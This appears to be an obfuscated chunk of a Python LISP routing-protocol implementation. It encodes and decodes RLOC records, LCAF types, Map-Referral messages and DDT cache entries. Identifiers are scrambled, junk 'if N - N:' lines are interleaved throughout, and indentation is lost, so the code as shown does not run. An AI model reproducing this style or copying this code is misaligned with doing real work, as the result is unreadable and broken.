if 51 - 51: O0 + Ii1I * OoooooooOO . oO0o + OoooooooOO
if 58 - 58: ooOoO0o . Oo0Ooo / I1ii11iIi11i + OoO0O00 * OoooooooOO / I1IiiI
iii11i11 = b""
if ( self . json ) :
iii11i11 = self . encode_json ( self . json )
if 80 - 80: II111iiii / iIii1I11I1II1 - OoO0O00 . I11i / II111iiii
if 20 - 20: o0oOOo0O0Ooo % i1IIi / Oo0Ooo / I11i * Oo0Ooo
oOOoOO = b""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
oOOoOO = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 63 - 63: I1IiiI
if 3 - 3: iII111i + I1ii11iIi11i
II111I1111iI = b""
if ( self . rloc_name ) :
II111I1111iI += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
II111I1111iI += ( self . rloc_name + "\0" ) . encode ( )
if 91 - 91: I1IiiI + O0 / OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 77 - 77: iIii1I11I1II1 + OoOoOO00 - ooOoO0o * oO0o % OoO0O00
IIIii1I = len ( OOO0 ) + len ( ii1111I ) + len ( oOOoOooo0oOO0 ) + len ( oOOoOO ) + 2 + len ( iii11i11 ) + self . rloc . addr_length ( ) + len ( II111I1111iI )
if 86 - 86: IiII * O0 + oO0o * I1Ii111
IIIii1I = socket . htons ( IIIii1I )
II11oOOOoO = struct . pack ( "HBBBBHH" , O0oOo , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , IIIii1I , socket . htons ( self . rloc . afi ) )
II11oOOOoO += self . rloc . pack_address ( )
return ( II11oOOOoO + II111I1111iI + OOO0 + ii1111I + oOOoOooo0oOO0 + oOOoOO + iii11i11 )
if 8 - 8: i11iIiiIii + OoOoOO00 . I1ii11iIi11i / OoooooooOO % II111iiii
if 21 - 21: oO0o - o0oOOo0O0Ooo + ooOoO0o . I1IiiI * oO0o * Ii1I
def encode ( self ) :
IIi1 = 0
if ( self . local_bit ) : IIi1 |= 0x0004
if ( self . probe_bit ) : IIi1 |= 0x0002
if ( self . reach_bit ) : IIi1 |= 0x0001
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
OO0Oo00OO0oo = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( IIi1 ) ,
socket . htons ( self . rloc . afi ) )
if 8 - 8: OoooooooOO - OoO0O00 / i11iIiiIii / O0 . IiII
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 86 - 86: ooOoO0o * OoooooooOO + iII111i + o0oOOo0O0Ooo
try :
OO0Oo00OO0oo = OO0Oo00OO0oo [ 0 : - 2 ] + self . encode_lcaf ( )
except :
lprint ( "Could not encode LCAF for RLOC-record" )
if 79 - 79: i1IIi % I1ii11iIi11i - OoO0O00 % I1ii11iIi11i
else :
OO0Oo00OO0oo += self . rloc . pack_address ( )
if 6 - 6: Oo0Ooo / iII111i . i11iIiiIii
return ( OO0Oo00OO0oo )
if 8 - 8: I1ii11iIi11i + O0 - oO0o % II111iiii . I1Ii111
if 86 - 86: IiII
def decode_lcaf ( self , packet , nonce , ms_json_encrypt ) :
Iii1iIII1Iii = "HBBBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 71 - 71: Ii1I - i1IIi . I1IiiI
O0ooO0O00oo0 , i1ii1iiI11ii1II1 , IIi1 , ooOoOoOo , oo0oOOo0 , iIi1IiiIII = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
iIi1IiiIII = socket . ntohs ( iIi1IiiIII )
packet = packet [ oOoOo000Ooooo : : ]
if ( iIi1IiiIII > len ( packet ) ) : return ( None )
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
if ( ooOoOoOo == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iIi1IiiIII > 0 ) :
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( iIi1IiiIII < oOoOo000Ooooo ) : return ( None )
if 25 - 25: OoOoOO00 + IiII . i11iIiiIii
o0oOO00O000O0 = len ( packet )
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
if 87 - 87: I1IiiI + OoooooooOO + O0
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
if ( packet == None ) : return ( None )
else :
packet = packet [ oOoOo000Ooooo : : ]
self . rloc_name = None
if ( O0ooO0O00oo0 == LISP_AFI_NAME ) :
packet , oOo = lisp_decode_dist_name ( packet )
self . rloc_name = oOo
else :
self . rloc . afi = O0ooO0O00oo0
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 32 - 32: Ii1I / I1ii11iIi11i . Ii1I
if 65 - 65: IiII
if 74 - 74: Oo0Ooo + i1IIi - II111iiii / ooOoO0o / iII111i
iIi1IiiIII -= o0oOO00O000O0 - len ( packet )
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
if 42 - 42: I1Ii111 - i11iIiiIii % II111iiii * ooOoO0o . O0 % I11i
elif ( ooOoOoOo == LISP_LCAF_GEO_COORD_TYPE ) :
if 82 - 82: Oo0Ooo % O0 + I1ii11iIi11i % I1ii11iIi11i
if 74 - 74: O0 * IiII . I11i - I1Ii111 + O0 + I11i
if 48 - 48: oO0o . o0oOOo0O0Ooo - OOooOOo
if 29 - 29: Oo0Ooo - Ii1I - Oo0Ooo
OOiIiIi111ii1I1 = lisp_geo ( "" )
packet = OOiIiIi111ii1I1 . decode_geo ( packet , iIi1IiiIII , oo0oOOo0 )
if ( packet == None ) : return ( None )
self . geo = OOiIiIi111ii1I1
if 86 - 86: OOooOOo * oO0o
elif ( ooOoOoOo == LISP_LCAF_JSON_TYPE ) :
Ii = oo0oOOo0 & 0x02
if 7 - 7: Oo0Ooo - I1IiiI / i1IIi * O0 - I11i + I1IiiI
if 27 - 27: iIii1I11I1II1 / OoooooooOO
if 61 - 61: IiII . IiII
if 17 - 17: OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( iIi1IiiIII < oOoOo000Ooooo ) : return ( None )
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
i11iI1I1I11II = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
i11iI1I1I11II = socket . ntohs ( i11iI1I1I11II )
if ( iIi1IiiIII < oOoOo000Ooooo + i11iI1I1I11II ) : return ( None )
if 95 - 95: iII111i / ooOoO0o + I1Ii111
packet = packet [ oOoOo000Ooooo : : ]
self . json = lisp_json ( "" , packet [ 0 : i11iI1I1I11II ] , Ii ,
ms_json_encrypt )
packet = packet [ i11iI1I1I11II : : ]
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
if 81 - 81: I1ii11iIi11i
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
if 76 - 76: I1Ii111 - O0
O0ooO0O00oo0 = socket . ntohs ( struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ] )
packet = packet [ 2 : : ]
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
if ( O0ooO0O00oo0 != 0 and lisp_is_json_telemetry ( self . json . json_string ) ) :
self . rloc . afi = O0ooO0O00oo0
packet = self . rloc . unpack_address ( packet )
if 7 - 7: II111iiii + I11i
if 99 - 99: iIii1I11I1II1 * oO0o
elif ( ooOoOoOo == LISP_LCAF_ELP_TYPE ) :
if 37 - 37: ooOoO0o * iII111i * I11i
if 11 - 11: I1IiiI
if 48 - 48: O0 . I11i
if 9 - 9: oO0o / Oo0Ooo
Ooooo = lisp_elp ( None )
Ooooo . elp_nodes = [ ]
while ( iIi1IiiIII > 0 ) :
IIi1 , O0ooO0O00oo0 = struct . unpack ( "HH" , packet [ : 4 ] )
if 45 - 45: I11i
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) : return ( None )
if 90 - 90: OoO0O00 * I1IiiI - I1IiiI % OoO0O00
oO0 = lisp_elp_node ( )
Ooooo . elp_nodes . append ( oO0 )
if 84 - 84: I1IiiI % I1IiiI * Ii1I
IIi1 = socket . ntohs ( IIi1 )
oO0 . eid = ( IIi1 & 0x4 )
oO0 . probe = ( IIi1 & 0x2 )
oO0 . strict = ( IIi1 & 0x1 )
oO0 . address . afi = O0ooO0O00oo0
oO0 . address . mask_len = oO0 . address . host_mask_len ( )
packet = oO0 . address . unpack_address ( packet [ 4 : : ] )
iIi1IiiIII -= oO0 . address . addr_length ( ) + 4
if 75 - 75: iIii1I11I1II1 - I1Ii111
Ooooo . select_elp_node ( )
self . elp = Ooooo
if 86 - 86: O0 + O0 / I11i - iIii1I11I1II1
elif ( ooOoOoOo == LISP_LCAF_RLE_TYPE ) :
if 42 - 42: OOooOOo
if 39 - 39: O0 % Ii1I . I11i * o0oOOo0O0Ooo
if 14 - 14: I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
if 9 - 9: oO0o + Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
IIiiiI = lisp_rle ( None )
IIiiiI . rle_nodes = [ ]
while ( iIi1IiiIII > 0 ) :
ooooO00o0 , o00oOo0O0OO , O0oo0O0 , O0ooO0O00oo0 = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 27 - 27: iIii1I11I1II1 + I1ii11iIi11i % I1Ii111
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) : return ( None )
if 15 - 15: OoooooooOO / i11iIiiIii % OOooOOo
IIIi11i1 = lisp_rle_node ( )
IIiiiI . rle_nodes . append ( IIIi11i1 )
if 52 - 52: I11i - oO0o . i11iIiiIii - II111iiii + Ii1I . iII111i
IIIi11i1 . level = O0oo0O0
IIIi11i1 . address . afi = O0ooO0O00oo0
IIIi11i1 . address . mask_len = IIIi11i1 . address . host_mask_len ( )
packet = IIIi11i1 . address . unpack_address ( packet [ 6 : : ] )
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
iIi1IiiIII -= IIIi11i1 . address . addr_length ( ) + 6
if ( iIi1IiiIII >= 2 ) :
O0ooO0O00oo0 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( O0ooO0O00oo0 ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , IIIi11i1 . rloc_name = lisp_decode_dist_name ( packet )
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if ( packet == None ) : return ( None )
iIi1IiiIII -= len ( IIIi11i1 . rloc_name ) + 1 + 2
if 34 - 34: i1IIi % Oo0Ooo . oO0o
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
self . rle = IIiiiI
self . rle . build_forwarding_list ( )
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
elif ( ooOoOoOo == LISP_LCAF_SECURITY_TYPE ) :
if 62 - 62: I1IiiI . Ii1I
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
OOooo = packet
OOoOOO = lisp_keys ( 1 )
packet = OOoOOO . decode_lcaf ( OOooo , iIi1IiiIII , False )
if ( packet == None ) : return ( None )
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
if 40 - 40: OoOoOO00 - II111iiii
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( OOoOOO . cipher_suite in OoOO0Ooo ) :
if ( OOoOOO . cipher_suite == LISP_CS_25519_CBC ) :
III11II111 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 29 - 29: I1IiiI - O0
if ( OOoOOO . cipher_suite == LISP_CS_25519_CHACHA ) :
III11II111 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 36 - 36: I1IiiI * I1IiiI
else :
III11II111 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 79 - 79: I1Ii111 - I11i
packet = III11II111 . decode_lcaf ( OOooo , iIi1IiiIII , False )
if ( packet == None ) : return ( None )
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
if ( len ( packet ) < 2 ) : return ( None )
O0ooO0O00oo0 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( O0ooO0O00oo0 )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if ( self . rloc . is_null ( ) ) : return ( packet )
if 4 - 4: i1IIi
O0o0OO = self . rloc_name
if ( O0o0OO ) : O0o0OO = blue ( self . rloc_name , False )
if 75 - 75: I1IiiI
if 27 - 27: i1IIi . Oo0Ooo . oO0o
if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if 58 - 58: OOooOOo
if 72 - 72: OoO0O00 + OOooOOo - Oo0Ooo % ooOoO0o . IiII
if 95 - 95: iII111i % OOooOOo - IiII - OoOoOO00 % o0oOOo0O0Ooo * O0
IIiII1i = self . keys [ 1 ] if self . keys else None
if ( IIiII1i == None ) :
if ( III11II111 . remote_public_key == None ) :
Oo0OOOOOOO0oo = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( Oo0OOOOOOO0oo , O0o0OO ) )
III11II111 = None
else :
Oo0OOOOOOO0oo = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( Oo0OOOOOOO0oo , O0o0OO ) )
III11II111 . compute_shared_key ( "encap" )
if 16 - 16: I1Ii111 / Oo0Ooo
if 48 - 48: Oo0Ooo / oO0o + iII111i % iII111i
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 30 - 30: OoooooooOO - iIii1I11I1II1 / oO0o * Ii1I / Ii1I
if 52 - 52: OoOoOO00 - OoO0O00 + I1IiiI + IiII
if 49 - 49: oO0o / I11i - oO0o
if 31 - 31: OoOoOO00 + I1IiiI + I1ii11iIi11i + I11i * II111iiii % oO0o
if 90 - 90: OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if ( IIiII1i ) :
if ( III11II111 . remote_public_key == None ) :
III11II111 = None
IiIIiI1i1IIiI = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( IiIIiI1i1IIiI , O0o0OO ) )
elif ( IIiII1i . compare_keys ( III11II111 ) ) :
III11II111 = IIiII1i
lprint ( " Maintain stored encap-keys for {}" . format ( O0o0OO ) )
if 51 - 51: I1IiiI . I11i - OoOoOO00
else :
if ( IIiII1i . remote_public_key == None ) :
Oo0OOOOOOO0oo = "New encap-keying for existing state"
else :
Oo0OOOOOOO0oo = "Remote encap-rekeying"
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
lprint ( " {} for {}" . format ( bold ( Oo0OOOOOOO0oo , False ) ,
O0o0OO ) )
IIiII1i . remote_public_key = III11II111 . remote_public_key
IIiII1i . compute_shared_key ( "encap" )
III11II111 = IIiII1i
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
self . keys = [ None , III11II111 , None , None ]
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
else :
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
packet = packet [ iIi1IiiIII : : ]
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
return ( packet )
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
def decode ( self , packet , nonce , ms_json_encrypt = False ) :
Iii1iIII1Iii = "BBBBHH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
self . priority , self . weight , self . mpriority , self . mweight , IIi1 , O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 46 - 46: o0oOOo0O0Ooo
if 28 - 28: i1IIi
IIi1 = socket . ntohs ( IIi1 )
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
self . local_bit = True if ( IIi1 & 0x0004 ) else False
self . probe_bit = True if ( IIi1 & 0x0002 ) else False
self . reach_bit = True if ( IIi1 & 0x0001 ) else False
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) :
packet = packet [ oOoOo000Ooooo - 2 : : ]
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
else :
self . rloc . afi = O0ooO0O00oo0
packet = packet [ oOoOo000Ooooo : : ]
packet = self . rloc . unpack_address ( packet )
if 62 - 62: I1Ii111 * I11i / I11i
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
def end_of_rlocs ( self , packet , rloc_count ) :
for OoOOoO0oOo in range ( rloc_count ) :
packet = self . decode ( packet , None , False )
if ( packet == None ) : return ( None )
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
return ( packet )
if 94 - 94: iII111i
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
if 62 - 62: Ii1I * OoOoOO00
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
if 23 - 23: iII111i . Ii1I - OoO0O00 / I1ii11iIi11i / O0
if 4 - 4: i1IIi % Oo0Ooo % Ii1I * ooOoO0o - I11i
if 76 - 76: iIii1I11I1II1 / ooOoO0o % I1ii11iIi11i % OOooOOo
if 13 - 13: IiII
if 56 - 56: Oo0Ooo
if 55 - 55: i11iIiiIii + iIii1I11I1II1 / i1IIi / I1ii11iIi11i
if 64 - 64: IiII . OoO0O00 * i11iIiiIii
if 18 - 18: Ii1I % o0oOOo0O0Ooo - Oo0Ooo
if 28 - 28: IiII
if 93 - 93: Oo0Ooo % i1IIi
if 51 - 51: oO0o % O0
if 41 - 41: I1IiiI * I1IiiI . I1Ii111
if 38 - 38: I1IiiI % i11iIiiIii
class lisp_map_referral ( object ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 17 - 17: i11iIiiIii
if 81 - 81: I1Ii111
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# I1IiiI . o0oOOo0O0Ooo
lisp_hex_string ( self . nonce ) ) )
if 64 - 64: i11iIiiIii - iII111i / OoOoOO00 * OoOoOO00 + IiII
if 70 - 70: o0oOOo0O0Ooo + I1Ii111
def encode ( self ) :
oOOOoOO = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "Q" , self . nonce )
return ( OO0Oo00OO0oo )
if 90 - 90: I1Ii111 . OOooOOo
if 1 - 1: Oo0Ooo
def decode ( self , packet ) :
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 55 - 55: I1ii11iIi11i - I1IiiI
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = socket . ntohl ( oOOOoOO [ 0 ] )
self . record_count = oOOOoOO & 0xff
packet = packet [ oOoOo000Ooooo : : ]
if 24 - 24: Ii1I / iII111i + OoOoOO00
Iii1iIII1Iii = "Q"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 87 - 87: Oo0Ooo . I1IiiI / ooOoO0o
self . nonce = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
return ( packet )
if 85 - 85: OoOoOO00 % iII111i - oO0o * i1IIi + OoooooooOO / I1ii11iIi11i
if 43 - 43: I1IiiI % OoOoOO00 % ooOoO0o * Ii1I + I1IiiI
if 29 - 29: I1IiiI . OoO0O00 * iII111i % o0oOOo0O0Ooo
if 100 - 100: iII111i * O0 . I1ii11iIi11i
if 85 - 85: I1ii11iIi11i + iII111i * iIii1I11I1II1 + OoOoOO00 . OoOoOO00 * I1IiiI
if 45 - 45: OoO0O00 % OoOoOO00
if 52 - 52: Oo0Ooo . II111iiii - I1Ii111 + Ii1I % I1ii11iIi11i
if 61 - 61: o0oOOo0O0Ooo % I1IiiI
class lisp_ddt_entry ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 42 - 42: I1ii11iIi11i + I1Ii111 - I11i * i1IIi + OoO0O00 . o0oOOo0O0Ooo
if 4 - 4: OoO0O00 + I1ii11iIi11i + Ii1I + I1ii11iIi11i / iII111i
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 15 - 15: OoooooooOO + I11i
if 76 - 76: O0 % Ii1I * ooOoO0o
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 13 - 13: OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
if 21 - 21: Ii1I % O0
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
IiI11111I1ii1 = self . delegation_set [ 0 ]
return ( IiI11111I1ii1 . print_node_type ( ) )
if 40 - 40: I1IiiI . Oo0Ooo - Ii1I
if 60 - 60: o0oOOo0O0Ooo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 25 - 25: Ii1I . II111iiii * iII111i - o0oOOo0O0Ooo + Ii1I
if 35 - 35: ooOoO0o
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
OooOoo0o = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( OooOoo0o == None ) :
OooOoo0o = lisp_ddt_entry ( )
OooOoo0o . eid . copy_address ( self . group )
OooOoo0o . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , OooOoo0o )
if 98 - 98: ooOoO0o * iII111i + OoOoOO00
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( OooOoo0o . group )
OooOoo0o . add_source_entry ( self )
if 86 - 86: oO0o - Oo0Ooo + i11iIiiIii % ooOoO0o % i1IIi / O0
if 49 - 49: ooOoO0o . I1ii11iIi11i * I1Ii111 * Ii1I * o0oOOo0O0Ooo - OoOoOO00
if 53 - 53: o0oOOo0O0Ooo * Ii1I / O0
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 81 - 81: Ii1I - iII111i / OOooOOo + I1IiiI + OoO0O00
if 24 - 24: o0oOOo0O0Ooo - i11iIiiIii + i11iIiiIii . I1IiiI - OOooOOo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 16 - 16: OOooOOo
if 74 - 74: I11i . II111iiii + O0 * II111iiii
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 50 - 50: IiII
if 7 - 7: OoO0O00 / I1IiiI * Ii1I % OoO0O00 + OoO0O00 % II111iiii
if 83 - 83: O0 % o0oOOo0O0Ooo
class lisp_ddt_node ( object ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 77 - 77: I1Ii111 - OoooooooOO
if 2 - 2: OoOoOO00 - OOooOOo * o0oOOo0O0Ooo / OoO0O00 - IiII % I1IiiI
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 98 - 98: iIii1I11I1II1
if 49 - 49: I1IiiI - I11i
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 63 - 63: i11iIiiIii . OoO0O00 . oO0o
if 85 - 85: oO0o . I1ii11iIi11i + i11iIiiIii
def is_ms_child ( self ) :
return ( self . map_server_child )
if 85 - 85: I11i
if 36 - 36: ooOoO0o % OoO0O00
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 1 - 1: OoooooooOO - OoOoOO00
if 35 - 35: I1Ii111
if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
if 92 - 92: iII111i % I1ii11iIi11i
if 16 - 16: oO0o
if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
class lisp_ddt_map_request ( object ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
if 52 - 52: ooOoO0o
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# I1IiiI + I11i + I1IiiI
red ( self . itr . print_address ( ) , False ) ,
green ( self . eid . print_address ( ) , False ) , self . nonce ) )
